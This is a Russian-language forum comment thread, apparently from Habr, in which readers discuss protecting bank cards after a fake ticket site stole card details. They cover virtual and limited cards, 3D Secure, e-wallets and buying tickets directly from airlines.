Если нет желания когда-нибудь писать десятки заявлений-жалоб-требований вернуть деньги, подобные посты на хабре и в итоге все-равно остаться без денег, то да — на активной карте, которую вы светите в интернете, в кафе и магазинах в любой момент времени должна быть только сумма, потерю которой вы переживете не сильно расстроившись.Pakos
27.09.2016 10:01+1И всё равно нужно писать заявление, а то «не сильно расстраиваться» придётся постоянно.
Al-Vas
27.09.2016 10:45Собственно у Тинькова можно выпустить 5 доп карт установить там лимиты и пользоваться ими, а основную хранить под замком.
nevzorofff
28.09.2016 11:11+1Как быть с кредиткой? Первести с неё на другую — вылет из грейса. Платить по дебетовке — туда надо ещё деньги сначала где-то взять, чтобы положить.
black_semargl
28.09.2016 13:02С кредиткой вообще плохо — с неё такими методами могут наснимать денег до выборки лимита по кредиту.
nevzorofff
28.09.2016 21:56Успокаивает то, что там грейс и вообще деньги не мои. Пусть докажут, что я их взял.
Priapus
28.09.2016 14:41Если так неймется платить кредиткой в интернетах, возможны 2 варианта навскидку:
1. Выпустить вторую карту к счету и установить по ней лимиты жесткие.
2. Если банк хреновый и не позволяет такого сделать, установить лимит на операции в интернете 0р, перед покупкой ставить нужный лимит, после покупки опять устанавливать в 0р.nevzorofff
28.09.2016 20:56+1Не то, чтобы неймётся, но там кешбек 3%, да и не надо делать лишние движения по поводу её пополнения.
Лимиты не совсем удобно: всякие автоплатежи на сотовые, интернет будут блокированы.
У меня для расходов на машинку дебетовка с 5% каши — а свободных денег не так уж много, приходиться безконца бабки тусовать с одной карты на другую, по мере их появления, очень неудобно: заезжаешь на АЗС и хлопаешь себя по лбу, что на карте рублей 300, а надо на 50 литров. Запускаешь браузер в телефоне и давай туда-сюда по c2c деньги гонять, благо что бесплатно.Priapus
28.09.2016 22:51А в чем беда установить лимит на платежи через инет в 1000р в месяц? Или во сколько там вам автоплатежи за интернет с сотовым обходятся? Даже если хулиганы упрут данные карты, много вы не потеряете.
Rbox
29.09.2016 20:31Немного оффтопика — а можно подробнее про 3% и 5% кэшбека? Это где такое?
nevzorofff
29.09.2016 22:43Бинбанк, там в выбранной категории — 5%, у меня категория авто: АЗС, запчасти, сервисы, мойки.
Можно активировать категорию покупки в интернете. Но все квазикеш операции типа пополнения яндекс-денег и киви кошелька — мимо.
Кукуруза — 3% фантиками, можно потратить в перекрёстке на 30% чека, в Евросети 99%. Раньше было ТНК — я в 15-м году в отпуск на машине ездил, слил на 8000Р бензина бонусами(больше просто не успел), ещё там же купил огнетушитель, трос и промывку инжектора(как я и предполагал — хрень оказалась, но за бонусы не жалко).
xbox
29.09.2016 22:58Разные банки разные проценты кэшбэка предлагают. Во многих банках есть кэшбэк с высокой ставкой на какую-то отдельную категорию. Многие из этих банков придумывают разные хитрости, чтобы клиентам было как можно сложнее воспользоваться повышенной ставкой. Эти хитрости могут заключаться в том, что категория товаров каждый месяц или каждый квартал меняется. Поэтому клиенту банка трудно просчитать заранее, как получить максимальный кэшбэк. А читать новости, рассылки итп с сообщениями, какая сейчас категория товаров у банка в почете, это очень утомительно. Есть еще банки, которые не сразу начисляют кэшбек, а просят в личном кабинете по каждой операции делать отметку, что она попадает под условия акции итп.
Я знаю один банк, который не морочит клиентам голову со сложными условиями — Бинбанк. Возможно есть и другие такие же. Но из тех, что на виду, таких простых условий не встречал. Кэшбек 1% на обычные покупки, 5% на одну из пяти категорий, которую сам клиент выбирает. При этом категория со временем без участия клиента не меняется. Самая интересная категория — интернет-покупки. Если ее выбрать, то при покупке в интернет-магазинах будет кэшбэк 5%.
Единственное, стоит иметь в виду, интернет-магазины принимают платежи по-разному и возможна ситуация при которой ни 1%, ни 5% ни зачислят при покупке. Для примера, один из самых крупных компьютерных интернет-магазинов принимает платежи по картам через сервис Яндекс.Деньги. При покупке в этом магазине кэшбек не зачисляют. Вероятно для банка такая покупка выглядит, как пополнение кошелька Яндекс.Денег или что-то похожее. А за пополнение кошельков итп кэшбек не начисляют. Клиент при оплате картой разницу не замечает, а для банка разница есть. Поэтому перед оплатой нужно смотреть, как интернет-магазин принимает платежи по картам. Если прием платежей организован через банки эквайеры, кэшбек 5% точно начистят, в остальных случаях, как повезет.DjOnline
30.09.2016 11:27+1Что за загадки «один из самых крупных компьютерных интернет-магазинов»? Почему нельзя сразу прямо написать название, к чему эта недосказанность?
N1ntend0
28.09.2016 20:55А можно управлять суточными лимитами.
Лайфхак «от бывалого»
Заводится несколько допкарт для разных целей. Для постоянного ношения с собой: лимит на операции в месяц + лимит на снятие наличных в сутки. В интернете не светится. Для трат в интернете: минимальный лимит на операции в месяц, минимальный лимит на снятие. Перед оплатой лимит на операции поднимается на размер операции. Через мобильный банк это делается за 2 минуты.
При этом не важно — карта кредитная или дебетовая.
d1f
26.09.2016 14:07+2> Что же нужно держать на карте по пять тысяч рублей
> и постоянно гонять деньги туда-сюда? Мороки слишком много.
* Держать на карте нужно ноль и непосредственно перед покупкой
переводить на карту нужную сумму. Дело пары минут.
* Выделенная карта для интернет покупок.
* Ну и покупать билеты не у посредников, а на сайте авиакомпании.compdemon
26.09.2016 14:35+1Именно так. Причем многие банки позволяют выпустить виртуальные карты, без «пластика» как раз для оплаты в разного рода онлайн-сервисах. А закинуть денег с карты на карту дело пары минут.
Это предотвратит дальнейшее списание, но за мошеннические «билеты» деньги все равно уведут. Тут только разбираться с банком об отмене перевода.
scg
26.09.2016 14:59+1Не знаю, как у других, но в Альфа банке выпуск виртуальных карт был платный и жили они всего два месяца. Дорого и неудобно. Проще и дешевле выпустить для таких целей реальный пластик.
andjel
26.09.2016 17:49Не совсем так. Есть у Альфы Мастеркард виртуал в пластике со сроком 2 года.
tyomitch
26.09.2016 18:53+1Если он в пластике, то что же в нём виртуального?
galaxy
26.09.2016 19:10+2У него нет чипа, магнитной полосы и эмбоссирования.
Mingun
26.09.2016 19:51+5А зачем тогда нужна непонятная пластмассовая хрень?
galaxy
26.09.2016 20:36+2на ней номер написан :)
не знаю, может у банков есть какие-то внутренние требования по этому поводу, но в интернет-банке этот номер не виден, и передать сотрудники банка мне его могут исключительно в виде пластмассовой хрени
muon
27.09.2016 08:28+1В России нет таких требований. У меня часть номера виртуальной карты видно в интернет-банкинге, а другая часть пришла в виде СМС, вместе с датой с CVV.
toxicdream
27.09.2016 12:55+1У нас КазКоммерцБанк позволяет через интернет-банкинг открыть сколько угодно мультивалютных виртуальных карт сроком на 10 лет за символические 1 тенге, но с комиссией в 1% за любой платеж.
Имея такую возможность каждый раз удивляюсь тем кто привязывает к разным интернет аккаунтам зарплатную карту.JumpErr
28.09.2016 20:55+1Вот только у других банков за оплату в интернете идёт кэшбэк от 1 до 3%, а не снятие комиссии в 1%.
mkll
26.09.2016 22:01+2QIWI, Яндекс.Деньги позволяют выпустить виртуальную карту за секунды. Закрыть ее и/или перевыпустить можно в любой момент. QIWI, кроме того, позволяет выпустить непополняемую «одноразовую» виртуальную карту. Т.е. если просто уделить некоторое внимание вопросу и посмотреть чуть шире, то окажется, что фраза «проще и дешевле выпустить для таких целей реальный пластик» не имеет под собой оснований.
scg
27.09.2016 07:27+1Не все пользуются QIWI и YM. Лично я — даже не собираюсь. Особенно, QIWI.
mkll
27.09.2016 12:39+1Ну так соберитесь. ;)
Ermito
27.09.2016 13:19QIWI славна тем, что сама любит списывать деньги со счета, если их сервисом долго не пользоваться.
mkll
27.09.2016 15:14Ну как бы мы говорим об использовании сервиса исключительно в качестве «прокладки» — для кратковременного хранения средств, предназначенных для оплаты в интернете. Т.е. это инструмент такой, в сценарии использования которого для нашей цели ситуаций «если долго не пользоваться» быть не может по определению.
Кроме того, МегаФон, например, тоже славен тем, что через полгода (или другой срок, не помню) неиспользования номера включается ежемесячное списание определенной суммы. И что? Вы не используете МегаФон? Без проблем. ;) Но я — использую уже лет 12 где-то и не планирую пока отказываться. Просто если номер мне не нужен — я убираю с него деньги и закрываю.
Мне как бы не с руки агитировать и рекламировать сервис, особенно вне рамок обсуждаемого сценария использования, но коль вы уж привели аргумент, то и я тоже приведу — я использую QIWI в качестве основного платежного средства, с виртуальными картами, с реальным пластиком (который уже перевыпускал дважды), т.е. достаточно долго, лет 5-6. И я искренне не понимаю смысла вашего аргумента, поскольку QIWI — не депозит, денег там хранить не нужно, а тем более, долгое время и не используя. Могу «сыграть на вашей стороне» и подкинуть еще аргументов — например, если вы перестали пользоваться номером, то через какое-то время, после отлеживания, оператор его продаст другому абоненту, который, таким образом, получит доступ к вашему QIWI-кошельку. Это так? Абсолютно. Это имеет какое-то значение для меня, как пользователя? Нет, если я не идиот, извините.
Понимаете, если, например, не пользоваться долго автомобилем, то у него рано или поздно спускают шины, садится аккумулятор, рассыхаются резинки в подвеске, «протухает» масло в двигателе и ржавеет кузов. Через 3-5 лет — это уже не автомобиль, а труп. Следует ли отсюда, что нам теперь не стОит покупать автомобили? ;) Да, следует — в том случае, если вы не собираетесь на них ездить, а собираетесь сгноить на стоянке.
AndyE
27.09.2016 20:16Проблему дальнейших списаний это решит, а вот с кем разбираться в случае мошеннической покупки, как в случае с товарищем автора. Как мне кажется — QIWI и ЯДеньги достаточно мутные конторы в плане ответственности перед законодательством. Хотя я интересовался данными системами достаточно давно и уже долгое время не слежу за развитием ситуации. Может быть что-то и изменилось.
black_semargl
28.09.2016 10:02Мутные-то мутные, но в качестве промежуточной прокладки вполне годятся.
Нельзя списать со счёта больше чем на нём естьvikarti
28.09.2016 10:20Вообще то в некоторых случаях можно. Технический овердрафт. Сама возможность связана с тем что списание с карты идет как бы в два этапа — авторизация (сразу) и непосредственно списание (через несколько дней но может быть до месяцев) и при этом:
— могут отличаться курсы на эти моменты.
— существуют (не касается обычно Интернета) операции когда просто приходит списание и банк обязан списать, да — загоняя карту в минус если надо
— существуют операции (обычно не в России) когда и авторизация и списание приходят с задержкой. если денег нет — будет теховердрафт.
А еще существует такой банк как Сбербанк, за которым замечалось устройство теховедрафта (именно теховердрафта а не блокировки) по просьбе приставов
Leo7777
26.09.2016 15:45Можно оплачивать через яндекс деньги с привязанной картой, которую можно легко отвязать и не засвечивать банковскую. Я к тому же привязал специальную карту для расчетов со своим счетом.
apakin
28.09.2016 13:32Билеты у посредников иногда дешевле, чем на сайте авиакомпании. Редко, но бывает.
dzok
29.09.2016 12:41Перед сезонами заметно — авиакомпании поднимают цены, а посредники уже выкупили кучу мест и торгуют ими по ценам ниже авиакомпаний, но значительно дороже чем покупали. Плюс скидки за опт. Вывод — покупать билеты надо либо сильно заранее, либо в день вылета (на горящие билеты часто скидки). Хотя в последнее время цены на сезонные билеты авиакомпании держат весь год.
astakhovtimofey
28.09.2016 20:55я например для этой цели пользуюсь виртуальной картой Яндекс Денег. Именно дня онлайн покупок. А на нее кладу нужную сумму со сберовской карты через СБ-онлайн. дело 1 минуты.
ReSpown
29.09.2016 10:17Так же можно было купить тикеты в онлайнБанкинге у Сбербанка. но увы, кто-то погнался за дешевизною. Итог, очень печален.
walkman7
27.09.2016 10:171. Использую физические карты для держания валюты (карты с собой не таскаю), еще есть именная карта в гривне (конвертирую в 5-10К гривен в месяц для растрат). Для оплаты в интернет есть электронные (виртуальные) карты на которые, при необходимости перевожу с реальных карт деньги.
2. Меняйте банк.
avegad
26.09.2016 14:07+3Похоже так же как списывает Amazon, Microsoft и кстати Aliexpress(но в последнем карта по дефолту к счёту не привязывается).
Достаточно один раз оплатить и за продление услуг будут списывать постоянно и без подтверждения через 3D Secure/Verified by Visa.
Для себя нашел выход из подобных ситуаций при работе с подобными сервисами:
Указывать дебетовую карту с отключенными кредитными/овердрафтовыми «фишками» и пополнять карту непосредственно перед оплатой(т.е. по получению уведомления об отключении сервиса) на требующуюся для оплаты сервиса сумму и не монетой больше.Dolbe
26.09.2016 15:22На Aliexpress оплата идет через AliPay — там то и хранится информация о Вас и Вашей карте. Не знаю как сейчас, но AliPay спрашивает иногда месяц, год и CVV/CVC карты. А если оплачивать через мобильное приложение Aliexress, то, если не ошибаюсь, вообще ничего не спрашивает.
AllexIn
26.09.2016 19:32Так речь не о данных карты. А об одноразовых смс паролях.
Daimos
28.09.2016 23:44Сегодня платил на Али — не пришла смс с кодом из банка, а 3dsec включен.
vikarti
29.09.2016 09:58а спросите в банке как они отреагируют если в ответ на запрос 3D Secure от экваера придет ответ что не поддерживается, давайте в обычном режиме? судя по описанию — согласятся провести в обычном режиме. Но имеют право и отказать. Могут другие лимиты применить.
Как пример:
— Укрсиббанк https://my.ukrsibbank.com/ru/personal/questions/card_limits/
— Казахстанского Альфа-Банка http://www.alfabank.kz/ru/retail/cards/restrictions
лимиты на операции без 3D Secure — 0
вот Российских банков где есть такое — я не знаю.
Dolbe
29.09.2016 15:10Именно.
Сам сегодня платил на Али, дважды. Первый раз с PC, перед этим «привязав» карту к AliPay (+месяц, год, CVV/CVC-код тоже указал).
Второй раз платил через мобильное приложение. Там ничего указывать вообще не пришлось. Даже никакого секретного кода. Тут вижу два варианта решения: либо лочить смартфон настолько, насколько веришь во все эти экраны защиты, либо через АлиПей (да и вообще любые интернет-платежи проводить) через спец-карту, перекидывая туда средства за 1-2 минуты. У Тинькова в этом плане очень удобно.
leon76
27.09.2016 14:17+ разные регистраторы доменов, для продления могут списать автоматом, не спрашивая ничего дополнительно
DarkByte
26.09.2016 14:17+3Так вроде же на 3D-S настаивает не банк, который выпустил карту, а платёжная система, через которую происходит оплата. Есть сайты где смс попросят ввести, есть сайты где этого не требуется.
xbox
26.09.2016 17:28Допускаю, что это так и есть. В смс от Сбербанка, в списаниях было указано «YM*Yandex.Direct» Если предположить, что платежный посредник решает, требовать ли код подтверждения, то, как я писал в статье, возникают вопросы либо к Yandex.Money, либо к Yandex.Direct.
blo
27.09.2016 12:14Подтверждаю. Имел дело с гейтом от Payeezy, там настройка 3D secure опциональна. Тоже был удивлен и техподдержка моего банка сказала что да, оплата возможна и без смс.
QDeathNick
27.09.2016 16:13+1Мне в банке подтвердили, что 3D-secure не на их стороне, и деньги можно и без него списать, как захочет тот, что снимает деньги. ИМХО это вообще бред и смысла я тогда не вижу в такой технологии.
Более того, я пару раз в магазине вводил неверный пинкод, о чём мне сообщал терминал, но там была возможность продолжить. Нажимая Да, я завершал покупку не вводя повторно пинкод. Деньги снимались.
Один раз вообще дал сыну карту и попросил его так оплатить покупку и он это сделал. После чего я позвонил в Росевробанк и попросил объяснить эту ситуацию. Сказали, что до 4000 может не требоваться ввод пинкода.
Ужасно всё это.playnet
28.09.2016 20:56нажимая отмену, выполняется оплата по подписи. Допустимо при не очень больших суммах и при не-запрете оплаты по подписи банком. Чеки при этом обычно различаются, «введен пин-код» и «подпись клиента».
Ke4
26.09.2016 14:28Да сколько бы на счету денег не было. Это другая история. Не все банки имеют настройки безопасности, где можно ограничивать сумму списания через интернет банкинг или на снятие налички. Тут как и всегда действует правило «предупрежден значит вооружен».
PaulAtreides
26.09.2016 14:29+6Проверка CVV и 3Dsecure — добрая воля мерчанта (магазина). С другой стороны, если владелец карты опротестовывает платёж, деньги ему тоже возвращает магазин, через который прошел платёж. В данном случае, это, очевидно, должен быть P2P-сервис, позволивший перевод.
msfs11
26.09.2016 18:17+2При использовании 3dSecure в случае претензий пользователя мерчанту ничего не грозит, риски берет на себя банк или эквайринг (точно не знаю).
ValdikSS
26.09.2016 14:50+5Мне тоже не понятно как без подтверждения смс они смогли списывать суммы.
- Злоумышленник регистрируется в любом сервисе, например, Яндекс.Деньгах, Amazon, Paypal, вводит свой номер мобильного телефона, если нужно.
- Привязывает карту человека, который ввел ее данные на фишинговом сайте, сделанным злоумышленником.
- СМС от сервиса приходит злоумышленнику, а СМС от банка о снятии и возврате средств для проверки работоспособности карты — владельцу карты.
В крупных сервисах, которые привязывают карту к себе, обычно нет 3D Secure. Amazon вообще даже CVV/CVC2 не требует, только номер карты и срок действия. Большинство сервисов не проверяют введенное имя, я всегда ввожу DICK BUTT, получал только один раз отказ.
Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке. По возможности, платите только электронными деньгами. По моему мнению, Webmoney на голову выше конкурентов по безопасности и удобству использования: для подтверждения платежей не требуется принимать СМС или иметь мобильный телефон под рукой вообще — есть приложение E-Num, которое генерирует одноразовые коды, принимая на вход кошелек, которому переводятся средства, сумму, challenge-код. Входные данные прилетают либо через Push, либо их можно считать камерой с QR-кода на экране оплаты, либо вообще вручную ввести. И приложение есть под все платформы, даже под Symbian и Java оно до сих пор работоспособное, не говоря уже о Blackberry и Bada.daiver19
26.09.2016 15:02СМС от сервиса приходит злоумышленнику, а СМС от банка о снятии и возврате средств для проверки работоспособности карты — владельцу карты.
Не знаю на счет всего, но чтобы подтвердить PayPal нужно ввести код из описания транзакции. Я этот код мог видеть только в клиент-банке, например.
Электронные деньги мне кажутся весьма мутной темой, но оболочка над платежами вроде PayPal — отличная вещь. Проблема только в том, что далеко не все сайты его поддерживают.
Ну и вообще небезопасность кредиток компенсируется относительной простотой возврата денег. Плюс банки научились неплохо так определять подозрительные транзакции. Да, это костыль, но всё же не стоит параноить сильно.ValdikSS
26.09.2016 15:28+5но оболочка над платежами вроде PayPal — отличная вещь. Проблема только в том, что далеко не все сайты его поддерживают.
Он хорош для клиентов, но головная боль магазинов. По мнению Paypal, прав в большинстве случаев клиент, даже если клиент неправ. А еще Paypal берет процент с магазина за свои услуги.
Ну и вообще небезопасность кредиток компенсируется относительной простотой возврата денег.
Мне не нравится, что вообще существует возможность воспользоваться моей картой, если ее данные кому-то попали в руки. В случае с электронными деньгами, я всегда заранее знаю, кому и сколько я плачу, и нет возможности снять мои деньги без подтверждения с моей стороны.
К тому же, у большинства банков уведомления об операциях с картой приходят только по СМС. Я телефоном пользуюсь редко, для меня это неважная вещь, и СМС я могу просто не увидеть, поэтому мне приходится писать скрипты для каждого банка отдельно, которые раз в 15 минут входят в интернет-банкинг, парсят страницу и отправляют уведомление по почте, если баланс изменился.
Раньше у ВТБ24 были замечательные карты одноразовых кодов — безопасные, маленькие, не требующие канал связи и электричества — но их заменили на СМС-коды, которые ни разу не безопасны и требуют наличие телефона.daiver19
26.09.2016 15:51Абсолютной безопасности не существует. Мне вот тоже не понравилось бы, что кто-то пользуется наличностью из моего кошелька, но я не могу гарантировать 100-процентную сохранность этой наличности (ну, кроме варианта не использования её вообще). Так что мне кажется, что всё упирается в уровень вашей параноии по отношению к юзабилити.
lexore
26.09.2016 16:49> А еще Paypal берет процент с магазина за свои услуги.
Это все берут. На этом и зарабатывают.
Vilgelm
26.09.2016 20:54+1Webmoney берет 0.8% с отправителя, например. PayPal берет около 4%. Причем не только с магазина, попробуйте отправить деньги из страны в страну. А еще у них просто ужасный курс (для покупок это можно отключить, а для вывода уже нет).
Daimos
28.09.2016 23:47При переводе денег палка спрашивает с кого списывать комиссию — с отправителя или получателя.
Leo7777
26.09.2016 16:55за 500 руб у них есть генераторы кодов, это отдельные устройства
maxwolf
26.09.2016 18:10Это устройство, увы, практически невозможно использовать в упомянутых автором предыдущего ответа скриптах. Сам мучаюсь :(
tendium
27.09.2016 10:51У меня были эти устройства. Два из трех сдохли (на экране просто целые строчки пропали так, что было невозможно понять, какая где цифра). Идея норм, физическое воплощение на три с минусом.
ElderMan
27.09.2016 11:39У Авангарда есть карты одноразовых кодов до сих пор.
Очень удобно. Особенно когда ты в роуминге где-нибудь в Анадыре.
vskv
26.09.2016 15:37+1Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке.
Неа. На данный момент это компромис между безопасностью и удобством пользования.
Хочется и чтобы не нужно было лишних манипуляций (пароли, смс-ки), и чтобы безопасно.
lexore
26.09.2016 17:04+7> Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке.
Каменный век был до внедрения 3D Secure. Тогда для списания денег с карточки нужно было только знать данные этой карточки. Можно сказать, что творились анархия, беспредел, и разгул кардеров. Никто никому не доверял. Карточки предпочитали никому не показывать. Банки могли спокойно отклонить любую транзакцию, как подозрительную. Клиентам было желательно постоянно проверять свои выписки. Сбербанк какое-то время вообще рубал все карточные транзакции из за рубежа. Мне кажется, такая ситуация здорово помогла в популяризации paypal — он предлагал безопасность там, где её не было.
Сейчас есть 3D secure, подтверждение по СМС, одноразовые коды и даже электронные брелки. Сейчас бронзовый век:)
tyomitch
26.09.2016 18:07для подтверждения платежей не требуется принимать СМС или иметь мобильный телефон под рукой вообще — есть приложение E-Num, которое генерирует одноразовые коды, принимая на вход кошелек, которому переводятся средства, сумму, challenge-код. <...> И приложение есть под все платформы, даже под Symbian и Java оно до сих пор работоспособное, не говоря уже о Blackberry и Bada.
Вы это приложение, наверное, на микроволновке запускаете? Раз оно у вас работает даже тогда, когда мобильного телефона нет под рукой вообще?
mikka1
26.09.2016 18:15+4Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке.
ИМХО, это проблема слишком многогранна, и дело тут не всегда в отсутствии прогресса.
Боюсь, что озвучу чрезвычайно крамольную вещь, но на самом деле никому эта безопасность нафиг не упала, особенно клиентам (по крайней мере, их 99% из тех, кто не сидит регулярно на Хабре, банках.ру и прочих тематических сайтах).
Что нужно клиенту? Клиенту нужно, чтобы всё сработало здесь и сейчас, причём как можно более простым способом. Начнёшь вводить назойливые проверки, блокировки операций по геолокации, вторые-третьи факторы и прочие разумные с точки зрения безопасности фишки — налетишь на аааагроменное недовольство клиентов, плохие отзывы («совершенно несправедливые!» с точки зрения безопасников) и отток клиентов.
Банку тоже чрезмерные замуты с безопасностью не нужны — люди привыкли к концепции «всё в 1 клик» (точнее, их к этому долго и активно приучали), поэтому любые многоэтажные конструкции проверки им нафиг не сдались. Будет слишком сложная «безопасность» — будет все больше людей, которые будут оказываться от услуг банка / мерчанта в пользу «более сговорчивых» коллег, а то и попросту возвращаться в кэш / WM / другие способы платежей.
Платежная система? Щаззз, этим наоборот надо, чтобы всё было проще, клиенты были довольны, а обороты росли. Поэтому в правилах той же Visa в Штатах написано, что мерчант НЕ ВПРАВЕ отказать клиенту в проведении операции по карте, если клиент отказывается предъявить документ, удостоверяющий личность :-) Почему? Опять же, не хотят негативной волны, которая может ударить по их бизнесу много сильнее, чем редкие мошенничества.
Единственный, кто более-менее должен быть заинтересован в безопасности — это мерчант, то бишь торговая точка, но и он понимает, что введение слишком сложных мер приведет к тому, что клиенты уйдут к конкурентам. Поверьте, никто (даже я, несмотря на понимание того, почему это делается) не оценит отмены заказа через 2 дня после его размещения с причиной "слишком высокий фрод-скор", а оставит злобнейший отзыв на Yelp'e и закажет то же самое в другом магазине.
Вот и получается такой вечный поиск тонкого баланса…Vilgelm
26.09.2016 21:04никто не оценит отмены заказа через 2 дня после его размещения с причиной «слишком высокий фрод-скор»
При этом они постоянно так делают при трансграничных заказах. Пожалуй половина американских магазинов при оплате русской картой или с русского IP морозят заказы (вплоть до месяца), отменяют их и всячески трахают мозги. Особенно когда твой заказ с черной пятницы отменили «весело» становится. А пойти и купить в другом не получится, ибо накрутки и все такое.mikka1
26.09.2016 22:34+2Поверьте, не только при трансграничных :-(
Я, например, больше никогда и ни за какие коврижки не буду связываться с Travelocity после того, как они мне в 3 часа утра отменили билет с вылетом на следующий день, а индусы на линии поддержки *категорически* отказались вообще что-то объяснять и комментировать — плюнул, купил тот же самый билет в Expedia и спокойно улетел…
А как насчет магазина, который повесил холд на 5 дней, а потом просто тупо отменил заказ без звонка или даже e-mail'a, а потом по телефону объяснил, что, дескать, по геолокации я в момент оформления находился слишком далеко от адреса доставки, поэтому их система решила, что, возможно, это мошенничество.
И в том, и в другом случае это были «нормальные» кредитки, выпущенные американскими банками, с американскими же billing-адресами.
Думаю, лишним будет говорить, что более в этих точках никогда не отоваривался.
Т.е. проблема налицо — вроде бы точки хотели сделать как лучше, типа как обезопасить себя и деньги клиента, но вот реализация сего хорошего намерения привела к тому, что клиент теперь потерян и, скорее всего, навсегда…
linux_art
28.09.2016 20:56У веб мани есть фундаментальная проблема — он толком не работает на Linux и в Chrome
ValdikSS
28.09.2016 21:01Вы про Light? Не знаю, пользуюсь Mini.
linux_art
28.09.2016 21:22Да, я про лайт и в частности авторизацию по сертификатам. Забавно то что до какого-то времени она отлично работала и я пользовался wm keeper lite регулярно. А когда этот функционал поломали — возможности пользоваться webmoney я лишился, т.к. остальные варианты мне не удобны.
Vilgelm
26.09.2016 20:28Для того, что бы 3D secure сработал, надо что бы он поддерживался как банком, так и мерчантом. Если мерчант не поддерживает 3D secure, то платеж пройдет и так. Видимо у Директа поддержки 3D secure нету.
fivepointseven
28.09.2016 20:56Amazon например даже CVV не спрашивает. Технически списывать без подтверждений возможно имея не более, чем номер карты и срок действия. Остальное — просто дополнительные уровни защиты.
cigulev
29.09.2016 18:47В некоторые сервисы дает заплатить без 3DS. В данном случае это Яндекс Директ. Рекуррентные платежи или платежи по шаблону в Сбербанке тут не причем.
Klajnor
26.09.2016 13:52+1Я ни разу не сталкивался с ситуацией, чтобы Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS)
3D Secure должен поддерживаться двумя сторонами, как банком выпустившим карту, так и тем банком чей платёжный шлюз используется для приёма платежа.
Только вчера платил за коммуналку (если точнее — электричество на сайте мосэнергосбыт) с карты сбера без ввода кода 3D Secure. Платёжный шлюз от Альфа-БанкаNikobraz
26.09.2016 13:57+1И в магазинах разных, даже в одной сети. В одном спрашивает код, в другом нет.
dartraiden
26.09.2016 14:01+6Да, 3D Secure это просто опциональный перенос ответственности на клиента. Если магазин хочет, то может сам нести риски.
В обычных (не защищённых 3-D Secure) транзакциях ответственность за операции по украденным картам несёт «мерчант» — торгово-сервисное предприятие, на сайте которого была произведена покупка товара/услуги по ворованной карте, при условии, что он не поддерживает эту технологию.
В случае использования 3-D Secure происходит так называемый «Перенос ответственности» (Liability Shift), когда ответственность переносится на банк-эмитент, выпустивший карту или на самого клиента.
jawaharlalnehru
26.09.2016 13:54+2Можно вопрос вот по этому утверждению:
1. Домен в зоне EU должен был по крайней мере насторожить.
Что-то не так с EU, или подозрительно, что не RU?
Epoiiika
26.09.2016 14:07+1ну обычно уважающие себя российские коммерческие сайты имеют зану RU и https
так просто принято в узких коммерческих кругахPaulAtreides
26.09.2016 14:29+5Скоро, благодаря letsencrypt, с хттпс проблем ни у кого не будет. :)
dartraiden
26.09.2016 14:37+3Нужно смотреть не на https, а на тип сертификата. У LetsEncrypt DV-сертификат, который означает лишь то, что соединение защищено и никто не «подсматривает».
У серьёзных организаций EV-сертификат, при выдаче которого удостоверяющий центр проводит, как минимум, проверку, существует ли организация в реальности.PaulAtreides
26.09.2016 14:58+7Это мы с вами знаем. А обычный пользователь, который только-только приучился смотреть на замочек рядом с урлом?
EV-сертификат — не панацея. Я однажды получал его на компанию, зарегистрированную неделей ранее в юрисдикции BVI.
В качестве подтверждения существования компании CA попросил предоставить счёт за телефонные переговоры за пару прошлых месяцев и счёт за услуги клининга. Эти документы оффшорный регистратор даёт нахаляву.
Этапы «убедиться, что компания зарегистрирована по адресу массовой регистрации» и «посмотреть на гугле адрес по которому предоставлялись услуги клининга и убедиться, что там во всём здании нет стольки квадратных метров, за сколько выставлен счёт», CA опускает.
sumanai
26.09.2016 16:32+1> А обычный пользователь, который только-только приучился смотреть на замочек рядом с урлом?
Такими темпами браузеры перестанут помечать замочком (или сделают его серым) для сайтов с простым сертификатом. Если уже не сделали.rPman
26.09.2016 17:21+3давно, простые сертификаты помечны просто замочком, а сертификаты с расширенной проверкой будут помечены названием организации зеленым цветом рядом.
il--ya
28.09.2016 12:58Странно, что я ни разу не слышал/не читал рекомендацию типа «никогда не вводите данные карты на не подписанных сайтах». Кучу всякой херни пишут в этих своих брошурках «how to stay safe online», а вот такого простого и очевидного совета не видел ни разу, хотя карт этих сменил штук 10 за последние 5 лет
bopoh13
26.09.2016 15:25+1Судя по скриншотам FF, соединение http (расчёт делается на то, что 90% пользователей шапку не смотрят). Не мешало бы настройку включить: user_pref(«browser.urlbar.trimURLs», false);
xbox, на 75% YМ принадлежат СБ.xbox
26.09.2016 17:46Первый сайт _aviapromo.eu_ использовал HTTPS и на заглавной странице (видно на одном из самых верхних скриншотов, сделанном на телефон) и на странице оплаты. HTML код страницы оплаты у него значительно отличался от _avia-scanners.ru_. Там я вообще не нашел никаких ссылок на банки. Подозрительные моменты там были, но так очевидно, как с Тиньковым там не получилось разобраться. Вот такой, например, подозрительный код там был в HTML,
С первым сайтом я сильно не успел поэксперементировать, поскольку хостинг-провайдер его по заявлению отключил. Но у меня остался HTML код страницы оплаты. Также как остался HTML код страницы оплаты со второго сайта. Я бы мог их выложить, но не знаю, нужно ли и куда выкладывать. Сохранял код через браузер. Скрипты при этом не сохранились. Поэтому по HTML коду полностью картину не восстановишь. Можно строить только предположения.<a href="view-source:https://aviapromo.eu/merch/payp2p.php" class="attribute-value">payp2p.php</a>
Второй сайт _avia-scanners.ru_ использовал http. В этот раз я уже более наглядно делал скриншоты. На картинках видно.
Otard
26.09.2016 13:57+5Я покупаю билеты так: ищу билеты по расписаниям, смотрю какие авиакомпании выполняют подходящие мне рейсы, покупаю билеты на сайте авиакомпании.
Aingis
26.09.2016 13:59+2Аналогично. Это ещё надёжнее в том плане, что заключается договор непосредственно с авиакомпанией, а не третьей стороной, когда концов не докопаешься.
tyomitch
26.09.2016 18:18+3Нередко на сайтах перекупщиков цены бывают ниже, чем на сайте самой авиакомпании. Приходится выбирать между риском и дороговизной.
Aingis
26.09.2016 21:20Ещё большой вопрос продадут ли реально по такой цене или «ой, извините, забыли сайт обновить»?
vlivyur
27.09.2016 09:54+1Мне так S7 не продавала дешёвый билет. При поиске есть, а как заказывать начинаешь — в четыре раза дороже. Ищем через некоторое время опять — есть, начинаем заказывать — нет. При этом все агрегаторы показывали только дорогие билеты. Так что вопрос большой и разносторонний.
muon
